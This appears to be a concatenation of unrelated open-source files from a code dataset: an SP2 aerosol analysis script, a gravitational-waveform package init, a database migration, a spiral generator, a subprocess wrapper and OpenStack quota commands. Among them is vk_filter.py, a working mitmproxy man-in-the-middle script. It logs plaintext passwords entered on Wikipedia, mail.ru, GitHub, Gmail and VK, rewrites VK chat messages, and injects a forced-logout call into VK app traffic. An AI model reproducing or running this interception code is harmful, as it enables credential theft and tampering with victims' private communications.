early_evap=0
early_evap_110=0
flat_fit=0
LF_high=0
for row in c.execute('''SELECT rBC_mass_fg, coat_thickness_nm, unix_ts_utc, LF_scat_amp, LF_baseline_pct_diff, sp2b_file, file_index, instr,actual_scat_amp
FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and rBC_mass_fg>=? and rBC_mass_fg<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle, min_rBC_mass, max_rBC_mass, begin_data,end_data)):
particles+=1
rBC_mass = row[0]
coat_thickness = row[1]
event_time = datetime.utcfromtimestamp(row[2])
LEO_amp = row[3]
LF_baseline_pctdiff = row[4]
file = row[5]
index = row[6]
instrt = row[7]
meas_scat_amp = row[8]
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
if meas_scat_amp < 6:
no_scat +=1
if rBC_VED > scat_lim:
no_scat_110+=1
data.append([rBC_VED,coat_thickness])
if LEO_amp == 0.0 and LF_baseline_pctdiff == None and meas_scat_amp >= 6:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -2:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -1:
fit_failure +=1
if LEO_amp == 0.0 and LF_baseline_pctdiff != None:
flat_fit +=1
if LEO_amp > LF_max:
LF_high +=1
if LEO_amp > 0:
data.append([rBC_VED,coat_thickness])
print '# of particles', particles
print 'no_scat', no_scat
print 'no_scat_110', no_scat_110
print 'fit_failure', fit_failure
print 'early_evap', early_evap
print 'early_evap_110', early_evap_110
print 'flat_fit', flat_fit
print 'LF_high', LF_high
evap_pct = (early_evap)*100.0/particles
evap_pct_110 = (early_evap_110)*100.0/particles
no_scat_pct = (no_scat)*100.0/particles
no_scat_pct_110 = no_scat_110*100./particles
print evap_pct, evap_pct_110, no_scat_pct,no_scat_pct_110
rBC_VEDs = [row[0] for row in data]
coatings = [row[1] for row in data]
median_coat = np.median (coatings)
print 'median coating',median_coat
#####hexbin coat vs core###
fig = plt.figure()
ax = fig.add_subplot(111)
#x_limits = [0,250]
#y_limits = [0,250]
#h = plt.hexbin(rBC_VEDs, coatings, cmap=cm.jet,gridsize = 50, mincnt=1)
hist = plt.hist(coatings, bins=50)
plt.xlabel('frequency')
plt.xlabel('Coating Thickness (nm)')
#cb = plt.colorbar()
#cb.set_label('frequency')
plt.show()
| mit | -1,434,911,381,491,213,300 | 22.904192 | 155 | 0.693136 | false | 2.420861 | false | false | false |
moble/scri | scri/__init__.py | 1 | 7034 | # Copyright (c) 2020, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/scri/blob/master/LICENSE>
"""Module for operating on gravitational waveforms in various forms
Classes
-------
WaveformBase : Base class
This is probably not needed directly; it is just used for inheritance by other objects.
WaveformModes: Complex spin-weighted spherical-harmonic modes
The modes must include all `m` values for a range of `ell` values. This is the "classic" version of a WaveformBase
object we might normally think of.
WaveformGrid: Complex quantity evaluated along world lines of grid points on the sphere
To perform translations or boosts, we need to transform to physical space, along a series of selected world lines
distributed evenly across the sphere. These values may need to be interpolated to new time values, and they will
presumably need to be transformed back to `WaveformModes`.
WaveformInDetector: Real quantities as observed in an inertial detector
Detectors only measure one polarization, so they deal with real quantities. Also, data is measured in evenly
spaced time steps. This object can be created from a `WaveformModes` object.
WaveformInDetectorFT: (Complex) Fourier transform of a `WaveformInDetector`
This contains only the positive-frequency values since the transformed data is real.
"""
import sys
import functools
import numba
from ._version import __version__
jit = functools.partial(numba.njit, cache=True)
jitclass = numba.experimental.jitclass
def version_info():
"""Show version information about this module and various dependencies"""
import spherical_functions
import quaternion
import scipy
import numba
import numpy
versions = "\n".join(
[
f"scri.__version__ = {__version__}",
f"spherical_functions.__version__ = {spherical_functions.__version__}",
f"quaternion.__version__ = {quaternion.__version__}",
f"scipy.__version__ = {scipy.__version__}",
f"numba.__version__ = {numba.__version__}",
f"numpy.__version__ = {numpy.__version__}",
]
)
return versions
# The speed of light is, of course, defined to be exact:
speed_of_light = 299792458.0 # m/s
# The value of the solar mass parameter G*M_sun is known to higher accuracy than either of its factors. The value
# here is taken from the publication "2015 Selected Astronomical Constants", which can be found at
# <http://asa.usno.navy.mil/SecK/Constants.html>. This is (one year more current than, but numerically the same as)
# the source cited by the Particle Data Group. It is given as 1.32712440041e20 m^3/s^2 in the TDB (Barycentric
# Dynamical Time) time scale, which seems to be the more relevant one, and looks like the more standard one for LIGO.
# Dividing by the speed of light squared, we get the mass of the sun in meters; dividing again, we get the mass of
# the sun in seconds:
m_sun_in_meters = 1476.62503851 # m
m_sun_in_seconds = 4.92549094916e-06 # s
# By "IAU 2012 Resolution B2", the astronomical unit is defined to be exactly 1 au = 149597870700 m. The parsec
# is, in turn, defined as "The distance at which 1 au subtends 1 arc sec: 1 au divided by pi/648000." Thus, the
# future-proof value of the parsec in meters is
parsec_in_meters = 3.0856775814913672789139379577965e16 # m
FrameType = [UnknownFrameType, Inertial, Coprecessing, Coorbital, Corotating] = range(5)
FrameNames = ["UnknownFrameType", "Inertial", "Coprecessing", "Coorbital", "Corotating"]
DataType = [UnknownDataType, psi0, psi1, psi2, psi3, psi4, sigma, h, hdot, news, psin] = range(11)
DataNames = ["UnknownDataType", "Psi0", "Psi1", "Psi2", "Psi3", "Psi4", "sigma", "h", "hdot", "news", "psin"]
SpinWeights = [sys.maxsize, 2, 1, 0, -1, -2, 2, -2, -2, -2, sys.maxsize]
ConformalWeights = [sys.maxsize, 2, 1, 0, -1, -2, 1, 0, -1, -1, -3]
RScaling = [sys.maxsize, 5, 4, 3, 2, 1, 2, 1, 1, 1, 0]
MScaling = [sys.maxsize, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2]
DataNamesLaTeX = [
r"\mathrm{unknown data type}",
r"\psi_0",
r"\psi_1",
r"\psi_2",
r"\psi_3",
r"\psi_4",
r"\sigma",
r"h",
r"\dot{h}",
r"\mathrm{n}",
r"\psi_n",
]
# It might also be worth noting that:
# - the radius `r` has spin weight 0 and boost weight -1
# - a time-derivative `d/du` has spin weight 0 and boost weight -1
# - \eth has spin weight +1; \bar{\eth} has spin weight -1
# - \eth in the GHP formalism has boost weight 0
# - \eth in the original NP formalism has undefined boost weight
# - It seems like `M` should have boost weight 1, but I'll have to think about the implications
# Set up the WaveformModes object, by adding some methods
from .waveform_modes import WaveformModes
from .mode_calculations import (
LdtVector,
LVector,
LLComparisonMatrix,
LLMatrix,
LLDominantEigenvector,
angular_velocity,
corotating_frame,
inner_product,
)
from .flux import (
energy_flux,
momentum_flux,
angular_momentum_flux,
poincare_fluxes,
boost_flux
)
WaveformModes.LdtVector = LdtVector
WaveformModes.LVector = LVector
WaveformModes.LLComparisonMatrix = LLComparisonMatrix
WaveformModes.LLMatrix = LLMatrix
WaveformModes.LLDominantEigenvector = LLDominantEigenvector
WaveformModes.angular_velocity = angular_velocity
from .rotations import (
rotate_decomposition_basis,
rotate_physical_system,
to_coprecessing_frame,
to_corotating_frame,
to_inertial_frame,
align_decomposition_frame_to_modes,
)
WaveformModes.rotate_decomposition_basis = rotate_decomposition_basis
WaveformModes.rotate_physical_system = rotate_physical_system
WaveformModes.to_coprecessing_frame = to_coprecessing_frame
WaveformModes.to_corotating_frame = to_corotating_frame
WaveformModes.to_inertial_frame = to_inertial_frame
WaveformModes.align_decomposition_frame_to_modes = align_decomposition_frame_to_modes
WaveformModes.energy_flux = energy_flux
WaveformModes.momentum_flux = momentum_flux
WaveformModes.angular_momentum_flux = angular_momentum_flux
WaveformModes.boost_flux = boost_flux
WaveformModes.poincare_fluxes = poincare_fluxes
from .waveform_grid import WaveformGrid
# from .waveform_in_detector import WaveformInDetector
from .extrapolation import extrapolate
from .modes_time_series import ModesTimeSeries
from .asymptotic_bondi_data import AsymptoticBondiData
from . import sample_waveforms, SpEC, LVC, utilities
__all__ = [
"WaveformModes",
"WaveformGrid",
"WaveformInDetector",
"FrameType",
"UnknownFrameType",
"Inertial",
"Coprecessing",
"Coorbital",
"Corotating",
"FrameNames",
"DataType",
"UnknownDataType",
"psi0",
"psi1",
"psi2",
"psi3",
"psi4",
"sigma",
"h",
"hdot",
"news",
"psin",
"DataNames",
"DataNamesLaTeX",
"SpinWeights",
"ConformalWeights",
"RScaling",
"MScaling",
"speed_of_light",
"m_sun_in_meters",
"m_sun_in_seconds",
"parsec_in_meters",
]
| mit | -5,533,757,833,371,105,000 | 35.071795 | 119 | 0.707279 | false | 3.270107 | false | false | false |
quarkslab/irma | frontend/extras/migration/versions/eb7141efd75a_version_1_3_0.py | 1 | 6216 | """version 1.3.0
Revision ID: eb7141efd75a
Revises: 430a70c8aa21
Create Date: 2016-01-06 13:38:46.918409
"""
# revision identifiers, used by Alembic.
revision = 'eb7141efd75a'
down_revision = '430a70c8aa21'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from irma.common.utils.utils import UUID
from sqlalchemy import Column, Integer, ForeignKey, String, BigInteger, Numeric
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.orm import relationship, backref
from api.common.models import tables_prefix
Base = declarative_base()
class File(Base):
__tablename__ = '{0}file'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
sha256 = Column(String)
sha1 = Column(String)
md5 = Column(String)
timestamp_first_scan = Column(Numeric)
timestamp_last_scan = Column(Numeric)
size = Column(BigInteger)
mimetype = Column(String)
path = Column(String)
class FileWeb(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
class FileWebMigration(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
__table_args__ = {'extend_existing': True}
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
scan_file_idx = Column(Integer)
def upgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_file', sa.Column('mimetype',
sa.String(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('external_id',
sa.String(length=36),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('id_parent',
sa.Integer(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('path',
sa.String(length=255),
nullable=True))
# Create external_id as new uuid
for fileweb in session.query(FileWeb).all():
if fileweb.external_id is None:
fileweb.external_id = UUID.generate()
session.commit()
# Now that all data are fixed set column to non nullable
op.alter_column('irma_fileWeb', 'external_id', nullable=False)
op.create_index(op.f('ix_irma_fileWeb_external_id'),
'irma_fileWeb',
['external_id'],
unique=False)
op.drop_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
type_='unique')
op.create_unique_constraint(None,
'irma_fileWeb',
['external_id'])
op.create_foreign_key(None,
'irma_fileWeb',
'irma_file',
['id_parent'],
['id'])
op.drop_column('irma_fileWeb', 'scan_file_idx')
op.add_column('irma_scan', sa.Column('force',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('mimetype_filtering',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('probelist',
sa.String(),
nullable=True))
op.add_column('irma_scan', sa.Column('resubmit_files',
sa.Boolean(),
nullable=True))
op.add_column('irma_tag', sa.Column('text',
sa.String(),
nullable=False))
op.drop_column('irma_tag', 'name')
def downgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_tag', sa.Column('name',
sa.VARCHAR(),
autoincrement=False,
nullable=False))
op.drop_column('irma_tag', 'text')
op.drop_column('irma_scan', 'resubmit_files')
op.drop_column('irma_scan', 'probelist')
op.drop_column('irma_scan', 'mimetype_filtering')
op.drop_column('irma_scan', 'force')
op.add_column('irma_fileWeb', sa.Column('scan_file_idx',
sa.INTEGER(),
autoincrement=False,
nullable=True))
# Create scan_file_idx autoincrement per scan
last_id_scan = None
scan_idx = 0
for fileweb in session.query(FileWebMigration).all():
if last_id_scan != fileweb.id_scan:
last_id_scan = fileweb.id_scan
scan_idx = 0
if fileweb.scan_file_idx is None:
fileweb.scan_file_idx = scan_idx
scan_idx += 1
op.create_unique_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
['id_scan', 'scan_file_idx'])
op.drop_index(op.f('ix_irma_fileWeb_external_id'),
table_name='irma_fileWeb')
op.drop_column('irma_fileWeb', 'path')
op.drop_column('irma_fileWeb', 'id_parent')
op.drop_column('irma_fileWeb', 'external_id')
op.drop_column('irma_file', 'mimetype')
| apache-2.0 | -4,304,994,386,734,047,000 | 36.221557 | 79 | 0.519466 | false | 4.060091 | false | false | false |
barneygale/cedar | cedar/spiral.py | 1 | 1117 | square = 16 * 25
class Spiral:
@classmethod
def spiral(cls, radius, start=(0,0)):
clip1 = (2*radius - 1)//square
clip2 = max(0, radius - square//2)
offset1 = (clip1 % 2) * square//2
for p in cls.spiral_inner(pow(clip1+1, 2)):
yield tuple(
v + # start co-ordinate
max(-clip2, # clamp low
min(clip2, # clamp high
offset1 + # apply offset for even-numbered grids
w * square)) # operate in steps of square
for v, w in zip(start, p)) # zip current spiral coords with start coords
@classmethod
def spiral_inner(cls, m):
yield (0, 0)
m -= 1
d = lambda a: (0, 1, 0, -1)[a % 4]
x = z = 0
i = 2
while m > 0:
for j in range(i >> 1):
x += d(i)
z += d(i+1)
yield (x, z)
m -= 1
if m == 0:
break
i += 1 | mit | 1,341,538,299,758,088,200 | 30.055556 | 90 | 0.385855 | false | 3.865052 | false | false | false |
schleichdi2/OPENNFR-6.1-CORE | opennfr-openembedded-core/scripts/lib/wic/utils/runner.py | 1 | 1774 | #!/usr/bin/env python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import subprocess
from wic import WicError
def runtool(cmdln_or_args):
""" wrapper for most of the subprocess calls
input:
cmdln_or_args: can be both args and cmdln str (shell=True)
return:
rc, output
"""
if isinstance(cmdln_or_args, list):
cmd = cmdln_or_args[0]
shell = False
else:
import shlex
cmd = shlex.split(cmdln_or_args)[0]
shell = True
sout = subprocess.PIPE
serr = subprocess.STDOUT
try:
process = subprocess.Popen(cmdln_or_args, stdout=sout,
stderr=serr, shell=shell)
sout, serr = process.communicate()
# combine stdout and stderr, filter None out and decode
out = ''.join([out.decode('utf-8') for out in [sout, serr] if out])
except OSError as err:
if err.errno == 2:
# [Errno 2] No such file or directory
raise WicError('Cannot run command: %s, lost dependency?' % cmd)
else:
raise # relay
return process.returncode, out
| gpl-2.0 | 1,398,075,700,761,582,800 | 33.115385 | 76 | 0.651635 | false | 3.942222 | false | false | false |
infosec-216/alice | vk_filter.py | 1 | 12539 | import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
import urllib # Russian messages support
from sets import Set
logging.basicConfig(filename="/root/mitm.log",level=logging.DEBUG)
class VK_user:
def __init__(self):
self.id = ""
self.peers = {}
self.messages = []
def __repr__(self):
s = "\n"
s += "User vk id = " + str(self.id) + "\n"
for peer in self.peers.keys():
s += "\tpeer " + peer + ": "
for hs in list(self.peers[peer]):
s += hs + " | "
s += "\n"
s += "\n"
s += "| toUser".ljust(20)+"| Topic".ljust(20)+"| Message".ljust(20)+'\n'
for m in self.messages:
s += str(m[1]).ljust(20) + str(m[2]).ljust(20) + str(m[0]).ljust(20) + "\n"
s += "\n"
return s
class VK_data:
def __init__(self):
self.users = {}
self.current_user = ""
# temp user to store data if we do not currently know the id
self.on_new_id("temp")
self.ips = {}
def from_a_typing(self, string):
m = re.match(r"act=a_typing&al=(?P<al>\d+)&gid=(?P<gid>\d+)&hash=(?P<hash>\w+)&peer=(?P<peer>\d+)", string)
if not m:
logging.debug("from_a_typing: Failed to parse " + string)
return [0]
logging.debug("Typing: al = " + m.group('al') + " gid = " + m.group('gid') +
" hash = " + m.group('hash') + " peer = " + m.group('peer'))
if m.group('peer') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('peer')] = Set([])
self.users[self.current_user].peers[m.group('peer')].add(m.group('hash'))
return [1]
def from_a_send(self, string):
m = re.match((r"act=a_send&al=(?P<al>\d+)&gid=(?P<gid>\d+)&guid" +
"=(?P<guid>\d+\.?\d*)&hash=(?P<hash>\w+)&media=(?P" +
"<media>\w*)&msg=(?P<msg>[\w\W]*)&title=(?P<title>\w*)" +
"&to=(?P<to>\d+)&ts=(?P<ts>\d+)"), string, re.UNICODE)
if not m:
logging.debug(string)
return [0, string]
# logging.debug("al = " + m.group('al'))
# logging.debug("gid = " + m.group('gid'))
# logging.debug("guid = " + m.group('guid'))
# logging.debug("hash = " + m.group('hash'))
# logging.debug("media = " + m.group('media'))
# logging.debug("msg = " + m.group('msg'))
# logging.debug("title = " + m.group('title'))
# logging.debug("to = " + m.group('to'))
# logging.debug("ts = " + m.group('ts'))
if m.group('to') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('to')] = Set([])
self.users[self.current_user].peers[m.group('to')].add(m.group('hash'))
self.users[self.current_user].messages.append([m.group('msg'), m.group('to'), m.group('hash')])
logging.debug(str(self.users[self.current_user]))
# Substitute message
string_ = ("act=a_send&al="+m.group('al')+"&gid="+m.group('gid')+"&guid="+
m.group('guid')+"&hash="+m.group('hash')+"&media="+m.group('media')+
"&msg="+"I have been pwn3d"+"&title="+m.group('title')+
"&to="+m.group('to')+"&ts="+m.group('ts'))
return [2, string_]
def from_a_check(self, string):
m_key = re.match(r"act=a_check&key=[\w\W]*", string, re.UNICODE)
m_id = re.match(r"act=a_check&id=(?P<id>\d+)&[\w\W]*", string, re.UNICODE)
if m_key:
return [1]
if m_id:
logging.debug("[a_check]: Found my id: " + m_id.group('id'))
self.on_new_id(m_id.group('id'))
return [1]
logging.debug(string)
return [0]
def decode_request(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
logging.debug("Exception in 'decode_request':")
logging.debug(e)
m = re.match(r"act=(?P<type>\w+)&\w+", string)
if not m:
return [0]
if m.group('type') == "a_typing":
return self.from_a_typing(string)
if m.group('type') == "a_send":
return self.from_a_send(string)
if m.group('type') == "a_check":
return self.from_a_check(string)
# No-info types
if m.group('type') == "login":
return [1]
if m.group('type') == "pad":
return [1]
if m.group('type') == "a_friends":
return [1]
if m.group('type') == "a_onlines":
return [1]
if m.group('type') == "a_release":
return [1]
if m.group('type') == "a_get_fast_chat":
return [1]
# logging.debug("Unable to decode type " + m.group('type')
# + "! " + string)
return [0]
def decode_response(self, string):
m = re.match(r"\{\"ts\":(?P<num>\d+),\"updates\":(?P<lstring>[\w\W]+),\"(?P<msg>[\w\W]+)\",\{\}(?P<rstring>[\w\W]*)\}", string)
if not m:
return [0]
self.users[self.current_user].messages.append([m.group('msg'), str(self.users[self.current_user].id), "-"])
logging.debug(str(self.users[self.current_user]))
string_ = "{\"ts\":"+m.group('num')+",\"updates\":"+m.group('lstring')+",\""+"you have been pwn3d"+"\",{}"+m.group('rstring')+"}"
return [2, string_]
def applet_deauth(self, string, ip):
m = re.match(r"[\w\W]+&access_token=(?P<token>[\w\W]*)&v=(?P<v>\d+\.?\d*)", string)
if not m:
return [0]
if ip not in self.ips.keys():
logging.debug("NEW ENTRY; IP = " + str(ip))
self.ips[ip] = [False, m.group('token'), m.group('v')]
if (self.ips[ip][0]):
logging.debug("IP" + str(ip) + " is already processed")
return [1]
return [2, "error=1"]
string_ = ("code=return{offline:API.account.setOffline({}),};&lang=ru&access_token=" +
m.group('token') +"&v=" + m.group('v'))
logging.debug("\nSENDING: " + string_ + "\n")
return [2, string_]
def decode_java(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'decode_java':")
# logging.debug(e)
pass
m = re.match((r"code=var mid = API.messages.send\(\{\"peer_id\":(?P<to>\d+),\"message\":\"(?P<msg>[\w\W]*)\"," +
"\"type\":\"(?P<type>[\w\W]*)\",\"guid\":(?P<guid>\d+),\"attachment\":(?P<att>[\w\W]*)"), string)
#logging.debug(str(string))
if not m:
return [0]
string_ = ("code=var mid = API.messages.send({\"peer_id\":" + m.group('to') + ",\"message\":\"i have been pwn3d\"," +
"\"type\":\"" + m.group('type') + "\",\"guid\":" + m.group('guid') + ",\"attachment\":" + m.group('att'))
return [2, string_]
def on_new_id(self, my_id):
if my_id not in self.users.keys():
self.users[my_id] = VK_user()
self.users[my_id].id = my_id
if (self.current_user == "temp") and (my_id != "temp"):
self.users[my_id] = self.users["temp"]
self.users[my_id].id = my_id
self.users["temp"] = VK_user()
self.current_user = my_id
# logging.debug("Known my_ids: " + str(self.users.keys()))
# logging.debug("Current my_id: " + str(self.current_user))
class PW_data:
def __init__(self):
self.passwords = []
def sniff_passwords(self, string, ip, vk_data):
if ("assword" not in string) and ("asswd" not in string) and ("pass" not in string) and ("Pass" not in string):
return
# logging.debug("STR: " + str(string))
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'sniff_passwords':")
# logging.debug(e)
return
# Wiki
m = re.match(r"wpName=(?P<login>[^&]*)&wpPassword=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "wikipedia.org", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Mail.ru
m = re.match(r"Login=(?P<login>[^&]*)&Domain=(?P<domain>[^&]*)&Password=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "mail.ru", m.group('login')+'@'+m.group('domain'), m.group('password')])
logging.debug(str(self))
return
# Github
m = re.match(r"[\w\W]*&login=(?P<login>[^&]*)&password=(?P<password>[^&]*)[\w\W]*", string)
if (m):
self.passwords.append([ip, "github.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Gmail
m = re.match(r"[\w\W]*&Email=(?P<login>[^&]*)&Passwd=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "gmail.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com
m = re.match(r"act=login&[\w\W]*&email=(?P<login>[^&]*)&pass=(?P<password>[^&]*)", string)
if (m):
self.passwords.append([ip, "vk.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com mobile
m = re.match(r"password=(?P<password>[^&]*)&[\w\W]*&username=(?P<login>[^&]*)&[\w\W]*&client_secret=(?P<secret>[^&]*)&client_id=(?P<id>\d+)", string)
if (m):
self.passwords.append([ip, "vk.com (mobile)", m.group('login'), m.group('password')])
logging.debug(str(self))
if ip not in vk_data.ips.keys():
vk_data.ips[ip] = [True, "", ""]
vk_data.ips[ip][0] = True
logging.debug("UNLOCKED IP = " + str(ip))
return
# Other websites
self.passwords.append([ip, string])
logging.debug(str(self))
def __repr__(self):
s = '\n'
s += "user".ljust(30) + "website".ljust(30) + "login".ljust(30) + "password".ljust(20) + '\n'
for entry in self.passwords:
if (len(entry) == 4):
s += entry[0].ljust(30)+entry[1].ljust(30)+entry[2].ljust(30)+entry[3].ljust(20) + '\n'
else:
s += entry[0].ljust(30)+entry[1] + '\n'
s += '\n'
return s
vk_db = VK_data()
pw_db = PW_data()
def request(context, flow):
try:
with decoded(flow.request): # automatically decode gzipped responses.
sourse_ip = str(flow.client_conn.address).split("'")[1]
dest_ip = str(flow.request.host)
#logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")")
pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db)
# Regular vk
result = vk_db.decode_request(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
# vk App deauth
result = vk_db.applet_deauth(str(flow.request.content), sourse_ip)
if (result[0] == 2):
flow.request.content = result[1]
# vk mobile App
result = vk_db.decode_java(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
except Exception as e:
# logging.debug("Exception in 'request':")
# logging.debug(e)
pass
def response(context, flow):
try:
with decoded(flow.response): # automatically decode gzipped responses.
result = vk_db.decode_response(str(flow.response.content))
if (result[0] == 2):
flow.response.content = result[1]
except Exception as e:
# logging.debug("Exception in 'response':")
# logging.debug(e)
pass
def start (context, argv):
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
| mit | -4,966,170,004,822,145,000 | 34.622159 | 157 | 0.490709 | false | 3.240052 | false | false | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstackclient/common/quota.py | 1 | 7859 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Quota action implementations"""
import itertools
import logging
import six
import sys
from cliff import command
from cliff import show
from openstackclient.common import utils
# List the quota items, map the internal argument name to the option
# name that the user sees.
COMPUTE_QUOTAS = {
'cores': 'cores',
'fixed_ips': 'fixed-ips',
'floating_ips': 'floating-ips',
'injected_file_content_bytes': 'injected-file-size',
'injected_file_path_bytes': 'injected-path-size',
'injected_files': 'injected-files',
'instances': 'instances',
'key_pairs': 'key-pairs',
'metadata_items': 'properties',
'ram': 'ram',
'security_group_rules': 'secgroup-rules',
'security_groups': 'secgroups',
}
VOLUME_QUOTAS = {
'gigabytes': 'gigabytes',
'snapshots': 'snapshots',
'volumes': 'volumes',
}
NETWORK_QUOTAS = {
'floatingip': 'floating-ips',
'security_group_rule': 'secgroup-rules',
'security_group': 'secgroups',
}
class SetQuota(command.Command):
"""Set quotas for project or class"""
log = logging.getLogger(__name__ + '.SetQuota')
def get_parser(self, prog_name):
parser = super(SetQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Set quotas for this project or class (name/ID)',
)
parser.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Set quotas for <class>',
)
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items()):
parser.add_argument(
'--%s' % v,
metavar='<%s>' % v,
type=int,
help='New value for the %s quota' % v,
)
parser.add_argument(
'--volume-type',
metavar='<volume-type>',
help='Set quotas for a specific <volume-type>',
)
return parser
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
compute_kwargs = {}
for k, v in COMPUTE_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
compute_kwargs[k] = value
volume_kwargs = {}
for k, v in VOLUME_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
if parsed_args.volume_type:
k = k + '_%s' % parsed_args.volume_type
volume_kwargs[k] = value
if compute_kwargs == {} and volume_kwargs == {}:
sys.stderr.write("No quotas updated")
return
if parsed_args.quota_class:
if compute_kwargs:
compute_client.quota_classes.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quota_classes.update(
parsed_args.project,
**volume_kwargs)
else:
if compute_kwargs:
compute_client.quotas.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quotas.update(
parsed_args.project,
**volume_kwargs)
class ShowQuota(show.ShowOne):
"""Show quotas for project or class"""
log = logging.getLogger(__name__ + '.ShowQuota')
def get_parser(self, prog_name):
parser = super(ShowQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Show this project or class (name/ID)',
)
type_group = parser.add_mutually_exclusive_group()
type_group.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Show quotas for <class>',
)
type_group.add_argument(
'--default',
dest='default',
action='store_true',
default=False,
help='Show default quotas for <project>'
)
return parser
def get_compute_volume_quota(self, client, parsed_args):
try:
if parsed_args.quota_class:
quota = client.quota_classes.get(parsed_args.project)
elif parsed_args.default:
quota = client.quotas.defaults(parsed_args.project)
else:
quota = client.quotas.get(parsed_args.project)
except Exception as e:
if type(e).__name__ == 'EndpointNotFound':
return {}
else:
raise e
return quota._info
def get_network_quota(self, parsed_args):
if parsed_args.quota_class or parsed_args.default:
return {}
service_catalog = self.app.client_manager.auth_ref.service_catalog
if 'network' in service_catalog.get_endpoints():
network_client = self.app.client_manager.network
return network_client.show_quota(parsed_args.project)['quota']
else:
return {}
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
# NOTE(dtroyer): These quota API calls do not validate the project
# or class arguments and return what appears to be
# the default quota values if the project or class
# does not exist. If this is determined to be the
# intended behaviour of the API we will validate
# the argument with Identity ourselves later.
compute_quota_info = self.get_compute_volume_quota(compute_client,
parsed_args)
volume_quota_info = self.get_compute_volume_quota(volume_client,
parsed_args)
network_quota_info = self.get_network_quota(parsed_args)
info = {}
info.update(compute_quota_info)
info.update(volume_quota_info)
info.update(network_quota_info)
# Map the internal quota names to the external ones
# COMPUTE_QUOTAS and NETWORK_QUOTAS share floating-ips,
# secgroup-rules and secgroups as dict value, so when
# neutron is enabled, quotas of these three resources
